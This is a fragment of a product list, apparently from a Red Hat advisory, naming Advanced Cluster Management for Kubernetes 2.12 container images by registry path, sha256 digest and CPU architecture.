"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
